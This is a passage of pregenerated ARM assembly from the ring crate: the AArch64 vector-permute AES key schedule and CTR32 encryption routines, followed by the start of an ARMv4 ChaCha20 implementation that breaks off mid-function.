ld1 {v4.2d}, [x10] // vmovdqa (%r11,%r10), %xmm4 # .Lk_mc_backward[]
tbl v3.16b, {v0.16b}, v1.16b // vpshufb %xmm1, %xmm0, %xmm3 # 0 = B
tbl v11.16b, {v8.16b}, v1.16b
eor v2.16b, v2.16b, v5.16b // vpxor %xmm5, %xmm2, %xmm2 # 2 = 2A
eor v10.16b, v10.16b, v13.16b
tbl v0.16b, {v0.16b}, v4.16b // vpshufb %xmm4, %xmm0, %xmm0 # 3 = D
tbl v8.16b, {v8.16b}, v4.16b
eor v3.16b, v3.16b, v2.16b // vpxor %xmm2, %xmm3, %xmm3 # 0 = 2A+B
eor v11.16b, v11.16b, v10.16b
tbl v4.16b, {v3.16b}, v1.16b // vpshufb %xmm1, %xmm3, %xmm4 # 0 = 2B+C
tbl v12.16b, {v11.16b},v1.16b
eor v0.16b, v0.16b, v3.16b // vpxor %xmm3, %xmm0, %xmm0 # 3 = 2A+B+D
eor v8.16b, v8.16b, v11.16b
and x11, x11, #~(1<<6) // and $0x30, %r11 # ... mod 4
eor v0.16b, v0.16b, v4.16b // vpxor %xmm4, %xmm0, %xmm0 # 0 = 2A+3B+C+D
eor v8.16b, v8.16b, v12.16b
sub w8, w8, #1 // nr--
.Lenc_2x_entry:
// top of round
and v1.16b, v0.16b, v17.16b // vpand %xmm0, %xmm9, %xmm1 # 0 = k
ushr v0.16b, v0.16b, #4 // vpsrlb $4, %xmm0, %xmm0 # 1 = i
and v9.16b, v8.16b, v17.16b
ushr v8.16b, v8.16b, #4
tbl v5.16b, {v19.16b},v1.16b // vpshufb %xmm1, %xmm11, %xmm5 # 2 = a/k
tbl v13.16b, {v19.16b},v9.16b
eor v1.16b, v1.16b, v0.16b // vpxor %xmm0, %xmm1, %xmm1 # 0 = j
eor v9.16b, v9.16b, v8.16b
tbl v3.16b, {v18.16b},v0.16b // vpshufb %xmm0, %xmm10, %xmm3 # 3 = 1/i
tbl v11.16b, {v18.16b},v8.16b
tbl v4.16b, {v18.16b},v1.16b // vpshufb %xmm1, %xmm10, %xmm4 # 4 = 1/j
tbl v12.16b, {v18.16b},v9.16b
eor v3.16b, v3.16b, v5.16b // vpxor %xmm5, %xmm3, %xmm3 # 3 = iak = 1/i + a/k
eor v11.16b, v11.16b, v13.16b
eor v4.16b, v4.16b, v5.16b // vpxor %xmm5, %xmm4, %xmm4 # 4 = jak = 1/j + a/k
eor v12.16b, v12.16b, v13.16b
tbl v2.16b, {v18.16b},v3.16b // vpshufb %xmm3, %xmm10, %xmm2 # 2 = 1/iak
tbl v10.16b, {v18.16b},v11.16b
tbl v3.16b, {v18.16b},v4.16b // vpshufb %xmm4, %xmm10, %xmm3 # 3 = 1/jak
tbl v11.16b, {v18.16b},v12.16b
eor v2.16b, v2.16b, v1.16b // vpxor %xmm1, %xmm2, %xmm2 # 2 = io
eor v10.16b, v10.16b, v9.16b
eor v3.16b, v3.16b, v0.16b // vpxor %xmm0, %xmm3, %xmm3 # 3 = jo
eor v11.16b, v11.16b, v8.16b
ld1 {v16.2d}, [x9],#16 // vmovdqu (%r9), %xmm5
cbnz w8, .Lenc_2x_loop
// middle of last round
add x10, x11, #0x80
// vmovdqa -0x60(%r10), %xmm4 # 3 : sbou .Lk_sbo
// vmovdqa -0x50(%r10), %xmm0 # 0 : sbot .Lk_sbo+16
tbl v4.16b, {v22.16b}, v2.16b // vpshufb %xmm2, %xmm4, %xmm4 # 4 = sbou
tbl v12.16b, {v22.16b}, v10.16b
ld1 {v1.2d}, [x10] // vmovdqa 0x40(%r11,%r10), %xmm1 # .Lk_sr[]
tbl v0.16b, {v23.16b}, v3.16b // vpshufb %xmm3, %xmm0, %xmm0 # 0 = sb1t
tbl v8.16b, {v23.16b}, v11.16b
eor v4.16b, v4.16b, v16.16b // vpxor %xmm5, %xmm4, %xmm4 # 4 = sb1u + k
eor v12.16b, v12.16b, v16.16b
eor v0.16b, v0.16b, v4.16b // vpxor %xmm4, %xmm0, %xmm0 # 0 = A
eor v8.16b, v8.16b, v12.16b
tbl v0.16b, {v0.16b},v1.16b // vpshufb %xmm1, %xmm0, %xmm0
tbl v1.16b, {v8.16b},v1.16b
ret
.size _vpaes_encrypt_2x,.-_vpaes_encrypt_2x
########################################################
## ##
## AES key schedule ##
## ##
########################################################
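## _vpaes_schedule_core below handles all three key sizes, dispatching
## on the bit length (the cmp/b.hi/b.eq sequence) to the 128-, 192- or
## 256-bit paths; the caller stores rounds = nbits/32 + 5 into the key
## structure beforehand (see vpaes_set_encrypt_key).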
.type _vpaes_key_preheat,%function
.align 4
_vpaes_key_preheat:
adrp x10, .Lk_inv
add x10, x10, :lo12:.Lk_inv
movi v16.16b, #0x5b // .Lk_s63
adrp x11, .Lk_sb1
add x11, x11, :lo12:.Lk_sb1
movi v17.16b, #0x0f // .Lk_s0F
ld1 {v18.2d,v19.2d,v20.2d,v21.2d}, [x10] // .Lk_inv, .Lk_ipt
adrp x10, .Lk_dksd
add x10, x10, :lo12:.Lk_dksd
ld1 {v22.2d,v23.2d}, [x11] // .Lk_sb1
adrp x11, .Lk_mc_forward
add x11, x11, :lo12:.Lk_mc_forward
ld1 {v24.2d,v25.2d,v26.2d,v27.2d}, [x10],#64 // .Lk_dksd, .Lk_dksb
ld1 {v28.2d,v29.2d,v30.2d,v31.2d}, [x10],#64 // .Lk_dkse, .Lk_dks9
ld1 {v8.2d}, [x10] // .Lk_rcon
ld1 {v9.2d}, [x11] // .Lk_mc_forward[0]
ret
.size _vpaes_key_preheat,.-_vpaes_key_preheat
.type _vpaes_schedule_core,%function
.align 4
_vpaes_schedule_core:
AARCH64_SIGN_LINK_REGISTER
stp x29, x30, [sp,#-16]!
add x29,sp,#0
bl _vpaes_key_preheat // load the tables
ld1 {v0.16b}, [x0],#16 // vmovdqu (%rdi), %xmm0 # load key (unaligned)
// input transform
mov v3.16b, v0.16b // vmovdqa %xmm0, %xmm3
bl _vpaes_schedule_transform
mov v7.16b, v0.16b // vmovdqa %xmm0, %xmm7
adrp x10, .Lk_sr // lea .Lk_sr(%rip),%r10
add x10, x10, :lo12:.Lk_sr
add x8, x8, x10
// encrypting, output zeroth round key after transform
st1 {v0.2d}, [x2] // vmovdqu %xmm0, (%rdx)
cmp w1, #192 // cmp $192, %esi
b.hi .Lschedule_256
b.eq .Lschedule_192
// 128: fall through
##
## .schedule_128
##
## 128-bit specific part of key schedule.
##
## This schedule is really simple, because all its parts
## are accomplished by the subroutines.
##
.Lschedule_128:
mov x0, #10 // mov $10, %esi
.Loop_schedule_128:
sub x0, x0, #1 // dec %esi
bl _vpaes_schedule_round
cbz x0, .Lschedule_mangle_last
bl _vpaes_schedule_mangle // write output
b .Loop_schedule_128
##
## .aes_schedule_192
##
## 192-bit specific part of key schedule.
##
## The main body of this schedule is the same as the 128-bit
## schedule, but with more smearing. The long, high side is
## stored in %xmm7 as before, and the short, low side is in
## the high bits of %xmm6.
##
## This schedule is somewhat nastier, however, because each
## round produces 192 bits of key material, or 1.5 round keys.
## Therefore, on each cycle we do 2 rounds and produce 3 round
## keys.
##
.align 4
.Lschedule_192:
sub x0, x0, #8
ld1 {v0.16b}, [x0] // vmovdqu 8(%rdi),%xmm0 # load key part 2 (very unaligned)
bl _vpaes_schedule_transform // input transform
mov v6.16b, v0.16b // vmovdqa %xmm0, %xmm6 # save short part
eor v4.16b, v4.16b, v4.16b // vpxor %xmm4, %xmm4, %xmm4 # clear 4
ins v6.d[0], v4.d[0] // vmovhlps %xmm4, %xmm6, %xmm6 # clobber low side with zeros
mov x0, #4 // mov $4, %esi
.Loop_schedule_192:
sub x0, x0, #1 // dec %esi
bl _vpaes_schedule_round
ext v0.16b, v6.16b, v0.16b, #8 // vpalignr $8,%xmm6,%xmm0,%xmm0
bl _vpaes_schedule_mangle // save key n
bl _vpaes_schedule_192_smear
bl _vpaes_schedule_mangle // save key n+1
bl _vpaes_schedule_round
cbz x0, .Lschedule_mangle_last
bl _vpaes_schedule_mangle // save key n+2
bl _vpaes_schedule_192_smear
b .Loop_schedule_192
##
## .aes_schedule_256
##
## 256-bit specific part of key schedule.
##
## The structure here is very similar to the 128-bit
## schedule, but with an additional "low side" in
## %xmm6. The low side's rounds are the same as the
## high side's, except no rcon and no rotation.
##
.align 4
.Lschedule_256:
ld1 {v0.16b}, [x0] // vmovdqu 16(%rdi),%xmm0 # load key part 2 (unaligned)
bl _vpaes_schedule_transform // input transform
mov x0, #7 // mov $7, %esi
.Loop_schedule_256:
sub x0, x0, #1 // dec %esi
bl _vpaes_schedule_mangle // output low result
mov v6.16b, v0.16b // vmovdqa %xmm0, %xmm6 # save cur_lo in xmm6
// high round
bl _vpaes_schedule_round
cbz x0, .Lschedule_mangle_last
bl _vpaes_schedule_mangle
// low round. swap xmm7 and xmm6
dup v0.4s, v0.s[3] // vpshufd $0xFF, %xmm0, %xmm0
movi v4.16b, #0
mov v5.16b, v7.16b // vmovdqa %xmm7, %xmm5
mov v7.16b, v6.16b // vmovdqa %xmm6, %xmm7
bl _vpaes_schedule_low_round
mov v7.16b, v5.16b // vmovdqa %xmm5, %xmm7
b .Loop_schedule_256
##
## .aes_schedule_mangle_last
##
## Mangler for last round of key schedule
## Mangles %xmm0
## when encrypting, outputs out(%xmm0) ^ 63
## when decrypting, outputs unskew(%xmm0)
##
## Always called right before return... jumps to cleanup and exits
##
.align 4
.Lschedule_mangle_last:
// schedule last round key from xmm0
adrp x11, .Lk_deskew // lea .Lk_deskew(%rip),%r11 # prepare to deskew
add x11, x11, :lo12:.Lk_deskew
cbnz w3, .Lschedule_mangle_last_dec
// encrypting
ld1 {v1.2d}, [x8] // vmovdqa (%r8,%r10),%xmm1
adrp x11, .Lk_opt // lea .Lk_opt(%rip), %r11 # prepare to output transform
add x11, x11, :lo12:.Lk_opt
add x2, x2, #32 // add $32, %rdx
tbl v0.16b, {v0.16b}, v1.16b // vpshufb %xmm1, %xmm0, %xmm0 # output permute
.Lschedule_mangle_last_dec:
ld1 {v20.2d,v21.2d}, [x11] // reload constants
sub x2, x2, #16 // add $-16, %rdx
eor v0.16b, v0.16b, v16.16b // vpxor .Lk_s63(%rip), %xmm0, %xmm0
bl _vpaes_schedule_transform // output transform
st1 {v0.2d}, [x2] // vmovdqu %xmm0, (%rdx) # save last key
// cleanup
eor v0.16b, v0.16b, v0.16b // vpxor %xmm0, %xmm0, %xmm0
eor v1.16b, v1.16b, v1.16b // vpxor %xmm1, %xmm1, %xmm1
eor v2.16b, v2.16b, v2.16b // vpxor %xmm2, %xmm2, %xmm2
eor v3.16b, v3.16b, v3.16b // vpxor %xmm3, %xmm3, %xmm3
eor v4.16b, v4.16b, v4.16b // vpxor %xmm4, %xmm4, %xmm4
eor v5.16b, v5.16b, v5.16b // vpxor %xmm5, %xmm5, %xmm5
eor v6.16b, v6.16b, v6.16b // vpxor %xmm6, %xmm6, %xmm6
eor v7.16b, v7.16b, v7.16b // vpxor %xmm7, %xmm7, %xmm7
ldp x29, x30, [sp],#16
AARCH64_VALIDATE_LINK_REGISTER
ret
.size _vpaes_schedule_core,.-_vpaes_schedule_core
##
## .aes_schedule_192_smear
##
## Smear the short, low side in the 192-bit key schedule.
##
## Inputs:
## %xmm7: high side, b a x y
## %xmm6: low side, d c 0 0
## %xmm13: 0
##
## Outputs:
## %xmm6: b+c+d b+c 0 0
## %xmm0: b+c+d b+c b a
##
.type _vpaes_schedule_192_smear,%function
.align 4
_vpaes_schedule_192_smear:
movi v1.16b, #0
dup v0.4s, v7.s[3]
ins v1.s[3], v6.s[2] // vpshufd $0x80, %xmm6, %xmm1 # d c 0 0 -> c 0 0 0
ins v0.s[0], v7.s[2] // vpshufd $0xFE, %xmm7, %xmm0 # b a _ _ -> b b b a
eor v6.16b, v6.16b, v1.16b // vpxor %xmm1, %xmm6, %xmm6 # -> c+d c 0 0
eor v1.16b, v1.16b, v1.16b // vpxor %xmm1, %xmm1, %xmm1
eor v6.16b, v6.16b, v0.16b // vpxor %xmm0, %xmm6, %xmm6 # -> b+c+d b+c b a
mov v0.16b, v6.16b // vmovdqa %xmm6, %xmm0
ins v6.d[0], v1.d[0] // vmovhlps %xmm1, %xmm6, %xmm6 # clobber low side with zeros
ret
.size _vpaes_schedule_192_smear,.-_vpaes_schedule_192_smear
##
## .aes_schedule_round
##
## Runs one main round of the key schedule on %xmm0, %xmm7
##
## Specifically, runs subbytes on the high dword of %xmm0
## then rotates it by one byte and xors into the low dword of
## %xmm7.
##
## Adds rcon from low byte of %xmm8, then rotates %xmm8 for
## next rcon.
##
## Smears the dwords of %xmm7 by xoring the low into the
## second low, result into third, result into highest.
##
## Returns results in %xmm7 = %xmm0.
## Clobbers %xmm1-%xmm4, %r11.
##
.type _vpaes_schedule_round,%function
.align 4
_vpaes_schedule_round:
// extract rcon from xmm8
movi v4.16b, #0 // vpxor %xmm4, %xmm4, %xmm4
ext v1.16b, v8.16b, v4.16b, #15 // vpalignr $15, %xmm8, %xmm4, %xmm1
ext v8.16b, v8.16b, v8.16b, #15 // vpalignr $15, %xmm8, %xmm8, %xmm8
eor v7.16b, v7.16b, v1.16b // vpxor %xmm1, %xmm7, %xmm7
// rotate
dup v0.4s, v0.s[3] // vpshufd $0xFF, %xmm0, %xmm0
ext v0.16b, v0.16b, v0.16b, #1 // vpalignr $1, %xmm0, %xmm0, %xmm0
// fall through...
// low round: same as high round, but no rotation and no rcon.
_vpaes_schedule_low_round:
// smear xmm7
ext v1.16b, v4.16b, v7.16b, #12 // vpslldq $4, %xmm7, %xmm1
eor v7.16b, v7.16b, v1.16b // vpxor %xmm1, %xmm7, %xmm7
ext v4.16b, v4.16b, v7.16b, #8 // vpslldq $8, %xmm7, %xmm4
// subbytes
and v1.16b, v0.16b, v17.16b // vpand %xmm9, %xmm0, %xmm1 # 0 = k
ushr v0.16b, v0.16b, #4 // vpsrlb $4, %xmm0, %xmm0 # 1 = i
eor v7.16b, v7.16b, v4.16b // vpxor %xmm4, %xmm7, %xmm7
tbl v2.16b, {v19.16b}, v1.16b // vpshufb %xmm1, %xmm11, %xmm2 # 2 = a/k
eor v1.16b, v1.16b, v0.16b // vpxor %xmm0, %xmm1, %xmm1 # 0 = j
tbl v3.16b, {v18.16b}, v0.16b // vpshufb %xmm0, %xmm10, %xmm3 # 3 = 1/i
eor v3.16b, v3.16b, v2.16b // vpxor %xmm2, %xmm3, %xmm3 # 3 = iak = 1/i + a/k
tbl v4.16b, {v18.16b}, v1.16b // vpshufb %xmm1, %xmm10, %xmm4 # 4 = 1/j
eor v7.16b, v7.16b, v16.16b // vpxor .Lk_s63(%rip), %xmm7, %xmm7
tbl v3.16b, {v18.16b}, v3.16b // vpshufb %xmm3, %xmm10, %xmm3 # 2 = 1/iak
eor v4.16b, v4.16b, v2.16b // vpxor %xmm2, %xmm4, %xmm4 # 4 = jak = 1/j + a/k
tbl v2.16b, {v18.16b}, v4.16b // vpshufb %xmm4, %xmm10, %xmm2 # 3 = 1/jak
eor v3.16b, v3.16b, v1.16b // vpxor %xmm1, %xmm3, %xmm3 # 2 = io
eor v2.16b, v2.16b, v0.16b // vpxor %xmm0, %xmm2, %xmm2 # 3 = jo
tbl v4.16b, {v23.16b}, v3.16b // vpshufb %xmm3, %xmm13, %xmm4 # 4 = sbou
tbl v1.16b, {v22.16b}, v2.16b // vpshufb %xmm2, %xmm12, %xmm1 # 0 = sb1t
eor v1.16b, v1.16b, v4.16b // vpxor %xmm4, %xmm1, %xmm1 # 0 = sbox output
// add in smeared stuff
eor v0.16b, v1.16b, v7.16b // vpxor %xmm7, %xmm1, %xmm0
eor v7.16b, v1.16b, v7.16b // vmovdqa %xmm0, %xmm7
ret
.size _vpaes_schedule_round,.-_vpaes_schedule_round
##
## .aes_schedule_transform
##
## Linear-transform %xmm0 according to tables at (%r11)
##
## Requires that %xmm9 = 0x0F0F... as in preheat
## Output in %xmm0
## Clobbers %xmm1, %xmm2
##
.type _vpaes_schedule_transform,%function
.align 4
_vpaes_schedule_transform:
and v1.16b, v0.16b, v17.16b // vpand %xmm9, %xmm0, %xmm1
ushr v0.16b, v0.16b, #4 // vpsrlb $4, %xmm0, %xmm0
// vmovdqa (%r11), %xmm2 # lo
tbl v2.16b, {v20.16b}, v1.16b // vpshufb %xmm1, %xmm2, %xmm2
// vmovdqa 16(%r11), %xmm1 # hi
tbl v0.16b, {v21.16b}, v0.16b // vpshufb %xmm0, %xmm1, %xmm0
eor v0.16b, v0.16b, v2.16b // vpxor %xmm2, %xmm0, %xmm0
ret
.size _vpaes_schedule_transform,.-_vpaes_schedule_transform
##
## .aes_schedule_mangle
##
## Mangle xmm0 from (basis-transformed) standard version
## to our version.
##
## On encrypt,
## xor with 0x63
## multiply by circulant 0,1,1,1
## apply shiftrows transform
##
## On decrypt,
## xor with 0x63
## multiply by "inverse mixcolumns" circulant E,B,D,9
## deskew
## apply shiftrows transform
##
##
## Writes out to (%rdx), and increments or decrements it
## Keeps track of round number mod 4 in %r8
## Preserves xmm0
## Clobbers xmm1-xmm5
##
.type _vpaes_schedule_mangle,%function
.align 4
_vpaes_schedule_mangle:
mov v4.16b, v0.16b // vmovdqa %xmm0, %xmm4 # save xmm0 for later
// vmovdqa .Lk_mc_forward(%rip),%xmm5
// encrypting
eor v4.16b, v0.16b, v16.16b // vpxor .Lk_s63(%rip), %xmm0, %xmm4
add x2, x2, #16 // add $16, %rdx
tbl v4.16b, {v4.16b}, v9.16b // vpshufb %xmm5, %xmm4, %xmm4
tbl v1.16b, {v4.16b}, v9.16b // vpshufb %xmm5, %xmm4, %xmm1
tbl v3.16b, {v1.16b}, v9.16b // vpshufb %xmm5, %xmm1, %xmm3
eor v4.16b, v4.16b, v1.16b // vpxor %xmm1, %xmm4, %xmm4
ld1 {v1.2d}, [x8] // vmovdqa (%r8,%r10), %xmm1
eor v3.16b, v3.16b, v4.16b // vpxor %xmm4, %xmm3, %xmm3
.Lschedule_mangle_both:
tbl v3.16b, {v3.16b}, v1.16b // vpshufb %xmm1, %xmm3, %xmm3
add x8, x8, #48 // add $-16, %r8
and x8, x8, #~(1<<6) // and $0x30, %r8
st1 {v3.2d}, [x2] // vmovdqu %xmm3, (%rdx)
ret
.size _vpaes_schedule_mangle,.-_vpaes_schedule_mangle
.globl vpaes_set_encrypt_key
.hidden vpaes_set_encrypt_key
.type vpaes_set_encrypt_key,%function
.align 4
vpaes_set_encrypt_key:
AARCH64_SIGN_LINK_REGISTER
stp x29,x30,[sp,#-16]!
add x29,sp,#0
stp d8,d9,[sp,#-16]! // ABI spec says so
lsr w9, w1, #5 // shr $5,%eax
add w9, w9, #5 // add $5,%eax
str w9, [x2,#240] // mov %eax,240(%rdx) # AES_KEY->rounds = nbits/32+5;
mov w3, #0 // mov $0,%ecx
mov x8, #0x30 // mov $0x30,%r8d
bl _vpaes_schedule_core
eor x0, x0, x0
ldp d8,d9,[sp],#16
ldp x29,x30,[sp],#16
AARCH64_VALIDATE_LINK_REGISTER
ret
.size vpaes_set_encrypt_key,.-vpaes_set_encrypt_key
.globl vpaes_ctr32_encrypt_blocks
.hidden vpaes_ctr32_encrypt_blocks
.type vpaes_ctr32_encrypt_blocks,%function
.align 4
vpaes_ctr32_encrypt_blocks:
AARCH64_SIGN_LINK_REGISTER
stp x29,x30,[sp,#-16]!
add x29,sp,#0
stp d8,d9,[sp,#-16]! // ABI spec says so
stp d10,d11,[sp,#-16]!
stp d12,d13,[sp,#-16]!
stp d14,d15,[sp,#-16]!
cbz x2, .Lctr32_done
// Note, unlike the other functions, x2 here is measured in blocks,
// not bytes.
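// Apparent calling convention, as used below: x0 = input, x1 = output,
// x2 = number of 16-byte blocks, x3 = key schedule, x4 = 16-byte IV
// whose final word is a big-endian 32-bit block counter.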
mov x17, x2
mov x2, x3
// Load the IV and counter portion.
ldr w6, [x4, #12]
ld1 {v7.16b}, [x4]
bl _vpaes_encrypt_preheat
tst x17, #1
rev w6, w6 // The counter is big-endian.
b.eq .Lctr32_prep_loop
// Handle one block so the remaining block count is even for
// _vpaes_encrypt_2x.
ld1 {v6.16b}, [x0], #16 // Load input ahead of time
bl _vpaes_encrypt_core
eor v0.16b, v0.16b, v6.16b // XOR input and result
st1 {v0.16b}, [x1], #16
subs x17, x17, #1
// Update the counter.
add w6, w6, #1
rev w7, w6
mov v7.s[3], w7
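// In effect: ctr = bswap32(lane 3 of v7); ctr++; lane 3 = bswap32(ctr).
// Only the last 32-bit lane of v7 is the counter; the first 12 IV bytes
// stay fixed.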
b.ls .Lctr32_done
.Lctr32_prep_loop:
// _vpaes_encrypt_core takes its input from v7, while _vpaes_encrypt_2x
// uses v14 and v15.
mov v15.16b, v7.16b
mov v14.16b, v7.16b
add w6, w6, #1
rev w7, w6
mov v15.s[3], w7
.Lctr32_loop:
ld1 {v6.16b,v7.16b}, [x0], #32 // Load input ahead of time
bl _vpaes_encrypt_2x
eor v0.16b, v0.16b, v6.16b // XOR input and result
eor v1.16b, v1.16b, v7.16b // XOR input and result (#2)
st1 {v0.16b,v1.16b}, [x1], #32
subs x17, x17, #2
// Update the counter.
add w7, w6, #1
add w6, w6, #2
rev w7, w7
mov v14.s[3], w7
rev w7, w6
mov v15.s[3], w7
b.hi .Lctr32_loop
.Lctr32_done:
ldp d14,d15,[sp],#16
ldp d12,d13,[sp],#16
ldp d10,d11,[sp],#16
ldp d8,d9,[sp],#16
ldp x29,x30,[sp],#16
AARCH64_VALIDATE_LINK_REGISTER
ret
.size vpaes_ctr32_encrypt_blocks,.-vpaes_ctr32_encrypt_blocks
#endif // !OPENSSL_NO_ASM && defined(OPENSSL_AARCH64) && defined(__ELF__)
|
mi2bjss/Pressel-site | 28,780 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/pregenerated/chacha-armv4-linux32.S | // This file is generated from a similarly-named Perl script in the BoringSSL
// source tree. Do not edit by hand.
#include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_ARM) && defined(__ELF__)
@ Silence ARMv8 deprecated IT instruction warnings. This file is used by both
@ ARMv7 and ARMv8 processors and does not use ARMv8 instructions.
.arch armv7-a
.text
#if defined(__thumb2__) || defined(__clang__)
.syntax unified
#endif
#if defined(__thumb2__)
.thumb
#else
.code 32
#endif
#if defined(__thumb2__) || defined(__clang__)
#define ldrhsb ldrbhs
#endif
.align 5
.Lsigma:
.long 0x61707865,0x3320646e,0x79622d32,0x6b206574 @ endian-neutral
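@ "expand 32-byte k" in little-endian: the standard ChaCha constant words.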
.Lone:
.long 1,0,0,0
.globl ChaCha20_ctr32_nohw
.hidden ChaCha20_ctr32_nohw
.type ChaCha20_ctr32_nohw,%function
.align 5
ChaCha20_ctr32_nohw:
ldr r12,[sp,#0] @ pull pointer to counter and nonce
stmdb sp!,{r0,r1,r2,r4-r11,lr}
adr r14,.Lsigma
ldmia r12,{r4,r5,r6,r7} @ load counter and nonce
sub sp,sp,#4*(16) @ off-load area
stmdb sp!,{r4,r5,r6,r7} @ copy counter and nonce
ldmia r3,{r4,r5,r6,r7,r8,r9,r10,r11} @ load key
ldmia r14,{r0,r1,r2,r3} @ load sigma
stmdb sp!,{r4,r5,r6,r7,r8,r9,r10,r11} @ copy key
stmdb sp!,{r0,r1,r2,r3} @ copy sigma
str r10,[sp,#4*(16+10)] @ off-load "rx"
str r11,[sp,#4*(16+11)] @ off-load "rx"
b .Loop_outer_enter
.align 4
.Loop_outer:
ldmia sp,{r0,r1,r2,r3,r4,r5,r6,r7,r8,r9} @ load key material
str r11,[sp,#4*(32+2)] @ save len
str r12, [sp,#4*(32+1)] @ save inp
str r14, [sp,#4*(32+0)] @ save out
.Loop_outer_enter:
ldr r11, [sp,#4*(15)]
ldr r12,[sp,#4*(12)] @ modulo-scheduled load
ldr r10, [sp,#4*(13)]
ldr r14,[sp,#4*(14)]
str r11, [sp,#4*(16+15)]
mov r11,#10
b .Loop
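@ Each pass of .Loop is one ChaCha double round (a column round followed
@ by a diagonal round); r11 = 10 passes gives ChaCha20's 20 rounds.
@ The reference quarter round is
@   a += b; d ^= a; d = rol(d,16)
@   c += d; b ^= c; b = rol(b,12)
@   a += b; d ^= a; d = rol(d, 8)
@   c += d; b ^= c; b = rol(b, 7)
@ ARM only rotates right, so rol(x,n) appears as ror #(32-n), hence the
@ 16/20/24/25 constants; the rotations are carried lazily in the shifted
@ operands of later instructions rather than applied up front.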
.align 4
.Loop:
subs r11,r11,#1
add r0,r0,r4
mov r12,r12,ror#16
add r1,r1,r5
mov r10,r10,ror#16
eor r12,r12,r0,ror#16
eor r10,r10,r1,ror#16
add r8,r8,r12
mov r4,r4,ror#20
add r9,r9,r10
mov r5,r5,ror#20
eor r4,r4,r8,ror#20
eor r5,r5,r9,ror#20
add r0,r0,r4
mov r12,r12,ror#24
add r1,r1,r5
mov r10,r10,ror#24
eor r12,r12,r0,ror#24
eor r10,r10,r1,ror#24
add r8,r8,r12
mov r4,r4,ror#25
add r9,r9,r10
mov r5,r5,ror#25
str r10,[sp,#4*(16+13)]
ldr r10,[sp,#4*(16+15)]
eor r4,r4,r8,ror#25
eor r5,r5,r9,ror#25
str r8,[sp,#4*(16+8)]
ldr r8,[sp,#4*(16+10)]
add r2,r2,r6
mov r14,r14,ror#16
str r9,[sp,#4*(16+9)]
ldr r9,[sp,#4*(16+11)]
add r3,r3,r7
mov r10,r10,ror#16
eor r14,r14,r2,ror#16
eor r10,r10,r3,ror#16
add r8,r8,r14
mov r6,r6,ror#20
add r9,r9,r10
mov r7,r7,ror#20
eor r6,r6,r8,ror#20
eor r7,r7,r9,ror#20
add r2,r2,r6
mov r14,r14,ror#24
add r3,r3,r7
mov r10,r10,ror#24
eor r14,r14,r2,ror#24
eor r10,r10,r3,ror#24
add r8,r8,r14
mov r6,r6,ror#25
add r9,r9,r10
mov r7,r7,ror#25
eor r6,r6,r8,ror#25
eor r7,r7,r9,ror#25
add r0,r0,r5
mov r10,r10,ror#16
add r1,r1,r6
mov r12,r12,ror#16
eor r10,r10,r0,ror#16
eor r12,r12,r1,ror#16
add r8,r8,r10
mov r5,r5,ror#20
add r9,r9,r12
mov r6,r6,ror#20
eor r5,r5,r8,ror#20
eor r6,r6,r9,ror#20
add r0,r0,r5
mov r10,r10,ror#24
add r1,r1,r6
mov r12,r12,ror#24
eor r10,r10,r0,ror#24
eor r12,r12,r1,ror#24
add r8,r8,r10
mov r5,r5,ror#25
str r10,[sp,#4*(16+15)]
ldr r10,[sp,#4*(16+13)]
add r9,r9,r12
mov r6,r6,ror#25
eor r5,r5,r8,ror#25
eor r6,r6,r9,ror#25
str r8,[sp,#4*(16+10)]
ldr r8,[sp,#4*(16+8)]
add r2,r2,r7
mov r10,r10,ror#16
str r9,[sp,#4*(16+11)]
ldr r9,[sp,#4*(16+9)]
add r3,r3,r4
mov r14,r14,ror#16
eor r10,r10,r2,ror#16
eor r14,r14,r3,ror#16
add r8,r8,r10
mov r7,r7,ror#20
add r9,r9,r14
mov r4,r4,ror#20
eor r7,r7,r8,ror#20
eor r4,r4,r9,ror#20
add r2,r2,r7
mov r10,r10,ror#24
add r3,r3,r4
mov r14,r14,ror#24
eor r10,r10,r2,ror#24
eor r14,r14,r3,ror#24
add r8,r8,r10
mov r7,r7,ror#25
add r9,r9,r14
mov r4,r4,ror#25
eor r7,r7,r8,ror#25
eor r4,r4,r9,ror#25
bne .Loop
ldr r11,[sp,#4*(32+2)] @ load len
str r8, [sp,#4*(16+8)] @ modulo-scheduled store
str r9, [sp,#4*(16+9)]
str r12,[sp,#4*(16+12)]
str r10, [sp,#4*(16+13)]
str r14,[sp,#4*(16+14)]
@ at this point we have first half of 512-bit result in
@ rx and second half at sp+4*(16+8)
cmp r11,#64 @ done yet?
#ifdef __thumb2__
itete lo
#endif
addlo r12,sp,#4*(0) @ shortcut or ...
ldrhs r12,[sp,#4*(32+1)] @ ... load inp
addlo r14,sp,#4*(0) @ shortcut or ...
ldrhs r14,[sp,#4*(32+0)] @ ... load out
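@ With fewer than 64 bytes left ("lo"), inp and out are redirected to the
@ stack: the code below then writes the raw keystream block to scratch
@ space and .Ltail XORs it against the real input one byte at a time.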
ldr r8,[sp,#4*(0)] @ load key material
ldr r9,[sp,#4*(1)]
#if __ARM_ARCH>=6 || !defined(__ARMEB__)
# if __ARM_ARCH<7
orr r10,r12,r14
tst r10,#3 @ are input and output aligned?
ldr r10,[sp,#4*(2)]
bne .Lunaligned
cmp r11,#64 @ restore flags
# else
ldr r10,[sp,#4*(2)]
# endif
ldr r11,[sp,#4*(3)]
add r0,r0,r8 @ accumulate key material
add r1,r1,r9
# ifdef __thumb2__
itt hs
# endif
ldrhs r8,[r12],#16 @ load input
ldrhs r9,[r12,#-12]
add r2,r2,r10
add r3,r3,r11
# ifdef __thumb2__
itt hs
# endif
ldrhs r10,[r12,#-8]
ldrhs r11,[r12,#-4]
# if __ARM_ARCH>=6 && defined(__ARMEB__)
rev r0,r0
rev r1,r1
rev r2,r2
rev r3,r3
# endif
# ifdef __thumb2__
itt hs
# endif
eorhs r0,r0,r8 @ xor with input
eorhs r1,r1,r9
add r8,sp,#4*(4)
str r0,[r14],#16 @ store output
# ifdef __thumb2__
itt hs
# endif
eorhs r2,r2,r10
eorhs r3,r3,r11
ldmia r8,{r8,r9,r10,r11} @ load key material
str r1,[r14,#-12]
str r2,[r14,#-8]
str r3,[r14,#-4]
add r4,r4,r8 @ accumulate key material
add r5,r5,r9
# ifdef __thumb2__
itt hs
# endif
ldrhs r8,[r12],#16 @ load input
ldrhs r9,[r12,#-12]
add r6,r6,r10
add r7,r7,r11
# ifdef __thumb2__
itt hs
# endif
ldrhs r10,[r12,#-8]
ldrhs r11,[r12,#-4]
# if __ARM_ARCH>=6 && defined(__ARMEB__)
